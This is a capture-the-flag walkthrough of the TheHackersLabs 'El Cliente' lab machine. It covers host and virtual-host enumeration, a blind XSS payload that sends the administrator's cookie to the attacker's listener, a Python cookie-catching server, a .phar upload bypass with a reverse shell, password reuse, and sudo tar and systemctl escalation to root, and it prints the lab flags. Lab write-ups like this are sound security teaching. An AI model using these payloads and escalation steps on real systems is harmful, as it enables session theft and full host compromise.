TheHackersLabs - El Cliente machine walkthrough (WP)
城南花已开

Information gathering

Service enumeration

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.157 08:00:27:91:d5:1e (Unknown)
192.168.60.254 00:50:56:e0:e6:12 (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.974 seconds (129.69 hosts/sec). 4 responded
export ip=192.168.60.157
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.157:22
Open 192.168.60.157:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-17 15:26 CST
Initiating ARP Ping Scan at 15:26
Scanning 192.168.60.157 [1 port]
Completed ARP Ping Scan at 15:26, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:26
Completed Parallel DNS resolution of 1 host. at 15:26, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:26
Scanning 192.168.60.157 [2 ports]
Discovered open port 80/tcp on 192.168.60.157
Discovered open port 22/tcp on 192.168.60.157
Completed SYN Stealth Scan at 15:26, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.157
Host is up, received arp-response (0.00039s latency).
Scanned at 2025-01-17 15:26:36 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:91:D5:1E (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Edit /etc/hosts and add the domain the site uses:

sudo vim /etc/hosts
192.168.60.157 arka.thl

There is a "Contact us" page, but when I tried it nothing useful seemed to happen.

Subdomain fuzzing

Fuzz for other virtual hosts by varying the Host header. The --hw 808 option hides every response with 808 words, which is what the default site returns for an unknown host, so only hosts that answer differently are shown.

Two subdomains show up: admin and www.admin, both answering 302. The 400 rows are not real hosts; "#www", "#mail" and "#smtp" are comment lines in the wordlist, and "#www.arka.thl" is simply an invalid Host header. The guess is that this is the administrator login.

❯ wfuzz -c -u "http://arka.thl" -H "Host: FUZZ.arka.thl" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hw 808
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://arka.thl/
Total requests: 114441

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000024: 302 0 L 0 W 0 Ch "admin"
000000290: 302 0 L 0 W 0 Ch "www.admin"
000009532: 400 10 L 35 W 300 Ch "#www"
000010581: 400 10 L 35 W 300 Ch "#mail"
000047706: 400 10 L 35 W 300 Ch "#smtp"
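The same Host-header fuzzing done by hand, as an added example that is not part of the original write-up. It uses only the Python standard library, measures the baseline response itself instead of hard-coding --hw 808, and skips the "#" comment lines that produced the 400 noise above. The target IP, base domain and wordlist path are the ones from this write-up; the fetcher parameter exists so the filtering logic can be exercised without a network.

```python
"""Minimal virtual-host fuzzer in the style of the wfuzz command above.

Added example, not code from the original write-up or from wfuzz. Sends
every wordlist entry as "Host: <word>.arka.thl" to the target IP and keeps
responses whose status or word count differ from a baseline request made
with a Host that certainly has no vhost.
"""
import http.client

TARGET_IP = "192.168.60.157"      # assumption: the host found by arp-scan above
BASE_DOMAIN = "arka.thl"
WORDLIST = "/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt"


def load_wordlist(lines):
    """Yield candidate labels, skipping blank lines and '#' comments.

    wfuzz sends comment lines verbatim, which is where the 400 responses
    for "#www", "#mail", "#smtp" come from: "#www.arka.thl" is not a
    valid Host header value.
    """
    for line in lines:
        word = line.strip()
        if word and not word.startswith("#"):
            yield word


def fetch(host_header, ip=TARGET_IP, timeout=5):
    """GET / from ip with the given Host header; return (status, words, bytes)."""
    conn = http.client.HTTPConnection(ip, 80, timeout=timeout)
    try:
        # http.client does not add its own Host header when one is supplied.
        conn.request("GET", "/", headers={"Host": host_header})
        resp = conn.getresponse()
        body = resp.read()
        return resp.status, len(body.split()), len(body)
    finally:
        conn.close()


def is_interesting(baseline, result):
    """True when status or word count differs from the catch-all vhost's
    response (the manual equivalent of wfuzz --hw <baseline words>)."""
    b_status, b_words, _ = baseline
    status, words, _ = result
    return status != b_status or words != b_words


def fuzz_vhosts(labels, baseline, fetcher=fetch):
    """Return [(label, status, words, bytes)] for labels that differ from baseline."""
    hits = []
    for label in labels:
        host = f"{label}.{BASE_DOMAIN}"
        try:
            result = fetcher(host)
        except OSError:
            continue          # connection reset / timeout: treat as no vhost
        if is_interesting(baseline, result):
            hits.append((label, *result))
    return hits


if __name__ == "__main__":
    # Learn what the default site returns (808 words in the write-up).
    baseline = fetch(f"nonexistent-{BASE_DOMAIN}")
    with open(WORDLIST, encoding="utf-8", errors="ignore") as fh:
        for label, status, words, size in fuzz_vhosts(load_wordlist(fh), baseline):
            print(f"{status} {words:5d}W {size:6d}Ch  {label}.{BASE_DOMAIN}")
```

Measuring the baseline first matters: a site that answers every unknown Host with the same catch-all page will otherwise drown the real virtual hosts in identical 200 responses.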

Add them to hosts. Note that sudo echo "..." >> /etc/hosts does not work: sudo elevates echo, but the >> redirection is opened by the unprivileged shell, which has no write access to /etc/hosts. Use tee instead:

echo "192.168.60.157  arka.thl admin.arka.thl www.admin.arka.thl" | sudo tee -a /etc/hosts

That gives a login page, but default passwords don't work, and SQL injection doesn't either.

Still, the bug should be in the contact form: it is the only place with any interaction, and an administrator reads the messages you send.

Blind XSS via the contact form

The guess is an XSS flaw. Because the payload is stored with the message and only fires later in the administrator's browser, this is blind stored XSS rather than reflected XSS; either way, the admin's browser ends up running our script.

[PayloadsAllTheThings, XSS Injection: data grabber](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS Injection/README.md#data-grabber)

We can try to steal the administrator's cookie. The cheat-sheet payload points at localhost; replace that with your own listener (here 192.168.60.100:8000, the attacking machine's address from the arp-scan output above), otherwise the admin's browser would just talk to itself:

<script>document.location='http://192.168.60.100:8000/xss.php?c='+document.cookie</script>

You can create a PHP script to receive it:

<?php
// Append every cookie delivered via ?c=... to cookies.txt
$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');
fwrite($fp, 'Cookie:' . $cookie . "\r\n");
fclose($fp);
?>

That writes each collected cookie to a file. It only runs behind a PHP-capable web server; a plain python3 -m http.server (used below) does not execute it, but the cookie still appears as the query string in the access log, which is all we need.

I start a Python HTTP server and watch the requests.

The administrator visits about once a minute:

❯ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.60.157 - - [17/Jan/2025 16:10:05] "GET /xss.php?c=PHPSESSID=jdbfr1esetnjob7jfgllb1ve8t HTTP/1.1" 200 -
192.168.60.157 - - [17/Jan/2025 16:11:05] "GET /xss.php?c=PHPSESSID=5huhk49mvq28c6ugtumcio18q6 HTTP/1.1" 200 -
192.168.60.157 - - [17/Jan/2025 16:12:07] "GET /xss.php?c=PHPSESSID=r14llc61uej9b4c6chcf5tub2d HTTP/1.1" 200 -
192.168.60.157 - - [17/Jan/2025 16:13:06] "GET /xss.php?c=PHPSESSID=svf8e58a4fbgnq6b19430bc6l3 HTTP/1.1" 200 -

Now try using this cookie to reach the admin page.

Install the Cookie-Editor browser extension first.

Set PHPSESSID to the captured value and refresh the page; you are logged in. The session id is different on every visit, so keep the HTTP server running and always use the most recent one.
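A listener that does what the PHP grabber above was meant to do, but under Python, since python3 -m http.server only logs the request and never executes xss.php. This is an added example, not code from the original write-up: it answers GET /xss.php?c=<cookie>, appends the cookie to cookies.txt, and keeps track of the newest PHPSESSID, which is the one to paste into Cookie-Editor because the admin's session id changes on every visit. The listen address 0.0.0.0:8000 and the file name are assumptions.

```python
"""Cookie-catching listener for the blind XSS payload.

Added example, not part of the original write-up. Handles the
/xss.php?c=<document.cookie> request the payload makes, logs it, and keeps
the latest PHPSESSID seen.
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit

LOG_FILE = "cookies.txt"          # assumption: same file name as the PHP grabber


def extract_cookie(path):
    """Return the (URL-decoded) value of the c= parameter, or None.

    Parsed by hand rather than with parse_qs: the browser sends
    document.cookie unencoded, and older parse_qs versions also split on
    ';', which would cut a multi-cookie string apart.
    """
    query = urlsplit(path).query
    for pair in query.split("&"):
        name, sep, value = pair.partition("=")
        if name == "c" and sep:
            return unquote(value)
    return None


def session_id(cookie_string):
    """Pull PHPSESSID out of a 'k=v; k2=v2' cookie string, or None."""
    for part in cookie_string.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "PHPSESSID" and value:
            return value
    return None


def latest_session(cookie_strings):
    """Newest PHPSESSID among the cookies collected so far."""
    latest = None
    for cookie in cookie_strings:
        sid = session_id(cookie)
        if sid:
            latest = sid
    return latest


class CookieCatcher(BaseHTTPRequestHandler):
    collected = []                # shared across requests, newest last

    def do_GET(self):
        cookie = extract_cookie(self.path)
        if cookie is not None:
            self.collected.append(cookie)
            with open(LOG_FILE, "a", encoding="utf-8") as fh:
                fh.write(f"Cookie:{cookie}\r\n")
            self.log_message("captured %s from %s (latest PHPSESSID %s)",
                             cookie, self.client_address[0],
                             latest_session(self.collected))
        # Always answer 200 so the victim's browser sees nothing unusual.
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"ok")


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8000), CookieCatcher).serve_forever()
```

Two caveats a practitioner would check here: document.location visibly navigates the admin away from the page, so for a stealthier version load the URL into an Image object instead; and if the session cookie had the HttpOnly flag, document.cookie would not expose it at all and you would have to drive the admin's browser to perform actions for you rather than steal the session.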

Once logged in, create a new project and upload a reverse shell.

Uploading a .php file directly is rejected by the file-type check; rename it to .phar and it is accepted.

The server still parses it as PHP. On Debian/Ubuntu the Apache PHP module configuration hands .phar and .phtml to the PHP interpreter as well as .php, so an extension blocklist that only names .php is bypassable.
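A model of why the rename works, as an added example and not code from the target application (whose upload filter we never saw): a blocklist-style check beside an allowlist-style one, audited against the file-name pattern Apache uses to decide what runs as PHP. The pattern is the one in Ubuntu's /etc/apache2/mods-available/php8.*.conf (an assumption to verify on your own build), and the extension sets are typical values, not the machine's.

```python
"""Upload-filter bypass model: shell.php is refused, shell.phar is executed.

Added example, not code from the original write-up or the target site.
"""
import re

# Debian/Ubuntu php module config: <FilesMatch ".+\.ph(ar|p|tml)$">
# Case-sensitive, like the FilesMatch directive and Linux file names.
APACHE_PHP_HANDLER = re.compile(r".+\.ph(ar|p|tml)$")

DENIED_EXTENSIONS = {"php", "php5", "phtml"}        # assumption: typical blocklist
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf"}


def extension(filename):
    """Last dotted component, lower-cased; '' when there is none."""
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def blocklist_allows(filename):
    """Vulnerable check: reject only the extensions the developer thought of."""
    return extension(filename) not in DENIED_EXTENSIONS


def allowlist_allows(filename):
    """Hardened check: accept only known-safe extensions, and exactly one dot,
    so names like shell.php.png cannot reach handlers that look at inner
    extensions."""
    parts = filename.split(".")
    return len(parts) == 2 and parts[1].lower() in ALLOWED_EXTENSIONS


def apache_executes(filename):
    """Would Apache hand this file name to the PHP module?"""
    return APACHE_PHP_HANDLER.search(filename) is not None


def audit(filenames, check):
    """Names that a filter passes but Apache would still execute as PHP."""
    return [f for f in filenames if check(f) and apache_executes(f)]


# Constructed candidates, including the rename used in this write-up.
CANDIDATES = ["shell.php", "shell.phar", "shell.phtml", "logo.png", "shell.php.png"]

if __name__ == "__main__":
    print("blocklist lets through and Apache runs:", audit(CANDIDATES, blocklist_allows))
    print("allowlist lets through and Apache runs:", audit(CANDIDATES, allowlist_allows))
```

Beyond the allowlist, an upload handler should also give the stored file a server-generated name, keep it outside the document root or under a directory where the PHP handler is disabled, and verify the content type from the bytes rather than from the client's Content-Type header.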

User privilege escalation

Listen on the port and catch the shell.

There are two users with a login shell, kobe and scott:

❯ pwncat-cs -lp 4444
[16:26:57] Welcome to pwncat 🐈! __main__.py:164
[16:26:58] received connection from 192.168.60.157:51526 bind.py:84
[16:26:59] 0.0.0.0:4444: normalizing shell path manager.py:957
0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
[16:27:01] 192.168.60.157:51526: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@TheHackersLabs-ElCliente:/var/www$ cat /etc/passwd |grep /bin/bash
root:x:0:0:root:/root:/bin/bash
kobe:x:1000:1000:kobe:/home/kobe:/bin/bash
scott:x:1001:1001:Scott,,,:/home/scott:/bin/bash

MySQL is listening on localhost:3306, and the web root contains a database config file:

(remote) www-data@TheHackersLabs-ElCliente:/var/www/html/arka.thl$ ss -luntp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.54:53 0.0.0.0:*
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 192.168.60.157%enp0s3:68 0.0.0.0:*
tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.54:53 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 10 127.0.0.1:36601 0.0.0.0:*
tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
tcp LISTEN 0 4096 *:22 *:*
tcp LISTEN 0 511 *:80 *:*
(remote) www-data@TheHackersLabs-ElCliente:/var/www/html/arka.thl$ cat db.php
<?php
const DB_HOST = '127.0.0.1';
const DB_USER = 'scott';
const DB_PASSWORD = 'gp34cb$ka64tfp10!';
const DB_NAME = 'arka_db';

$mysqli = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);

if (mysqli_error($mysqli)) {
die('Ocurrio un error al conectarse a la base de datos ' . mysqli_error($mysqli));
}

Try logging in to MySQL with that password:

(remote) www-data@TheHackersLabs-ElCliente:/var/www/html/arka.thl$ mysql -uscott -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 496
Server version: 8.0.40-0ubuntu0.24.04.1 (Ubuntu)

Copyright (c) 2000, 2024, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show database;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'database' at line 1
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| arka_db |
| information_schema |
| performance_schema |
+--------------------+
3 rows in set (0.06 sec)

mysql> use arka_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-------------------+
| Tables_in_arka_db |
+-------------------+
| messages |
| projects |
| users |
+-------------------+
3 rows in set (0.00 sec)

mysql> select * from users;
+----+----------+--------------------------------------------------------------+
| id | username | password |
+----+----------+--------------------------------------------------------------+
| 1 | admin | $2y$10$R1rGblRTFf4aez.0z71svOoGEOLXssZQoBSEGVqcDFVeC5wF1hRsm |
+----+----------+--------------------------------------------------------------+
1 row in set (0.00 sec)

Don't bother cracking this hash; it is bcrypt and won't come out.

Instead, try the MySQL connection password on the scott system account (password reuse).

scott can run tar as kobe via sudo, so this is the standard GTFOBins tar escalation: --checkpoint-action=exec runs a command during the archive operation.

Because the shell came in through pwncat, PS1 shows raw escape sequences after the switch; starting a bash child process fixes it.

That gets the user flag:

(remote) www-data@TheHackersLabs-ElCliente:/var/www/html/arka.thl$ su scott
Password:
(remote) scott@TheHackersLabs-ElCliente:/var/www/html/arka.thl$
(remote) scott@TheHackersLabs-ElCliente:/home/scott$ sudo -l
[sudo] password for scott:
Matching Defaults entries for scott on TheHackersLabs-ElCliente:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User scott may run the following commands on TheHackersLabs-ElCliente:
(kobe) PASSWD: /usr/bin/tar
(remote) scott@TheHackersLabs-ElCliente:/home/scott$ sudo -u kobe /usr/bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
/usr/bin/tar: Removing leading `/' from member names
\[\](remote)\[\] \[\]kobe@TheHackersLabs-ElCliente\[\]:\[\]/home/scott\[\]$ bash
(remote) kobe@TheHackersLabs-ElCliente:/home/scott$ id
uid=1000(kobe) gid=1000(kobe) groups=1000(kobe)
(remote) kobe@TheHackersLabs-ElCliente:/home/kobe$ cat user.txt
12595a7851c25233e157884a46331355

Root privilege escalation

sudo permissions

Standard systemctl abuse:

(remote) kobe@TheHackersLabs-ElCliente:/home/kobe$ sudo -l
Matching Defaults entries for kobe on TheHackersLabs-ElCliente:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User kobe may run the following commands on TheHackersLabs-ElCliente:
(ALL) NOPASSWD: /bin/systemctl

Write a unit whose ExecStart sets the SUID bit on /bin/bash, then have systemctl run it as root. systemctl enable --now on a unit file path creates the link itself, so the separate link step is redundant (harmless here). chmod +s sets both setuid and setgid, and the change persists together with the enabled unit; after the exercise, clean up with chmod -s /bin/bash and systemctl disable exp.service.

(remote) kobe@TheHackersLabs-ElCliente:/home/kobe$ echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > exp.service
(remote) kobe@TheHackersLabs-ElCliente:/home/kobe$ sudo systemctl link /home/kobe/exp.service
Created symlink /etc/systemd/system/exp.service → /home/kobe/exp.service.
(remote) kobe@TheHackersLabs-ElCliente:/home/kobe$ sudo systemctl enable --now /home/kobe/exp.service
Created symlink /etc/systemd/system/multi-user.target.wants/exp.service → /home/kobe/exp.service.
(remote) kobe@TheHackersLabs-ElCliente:/home/kobe$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1446024 Mar 31 2024 /bin/bash
(remote) kobe@TheHackersLabs-ElCliente:/home/kobe$ bash -p
(remote) root@TheHackersLabs-ElCliente:/home/kobe# id
uid=1000(kobe) gid=1000(kobe) euid=0(root) egid=0(root) groups=0(root),1000(kobe)
(remote) root@TheHackersLabs-ElCliente:/home/kobe# whoami
root
(remote) root@TheHackersLabs-ElCliente:/home/kobe# cat /root/root.txt
526c3069f7a4d21d9e2dfb65ba1240c7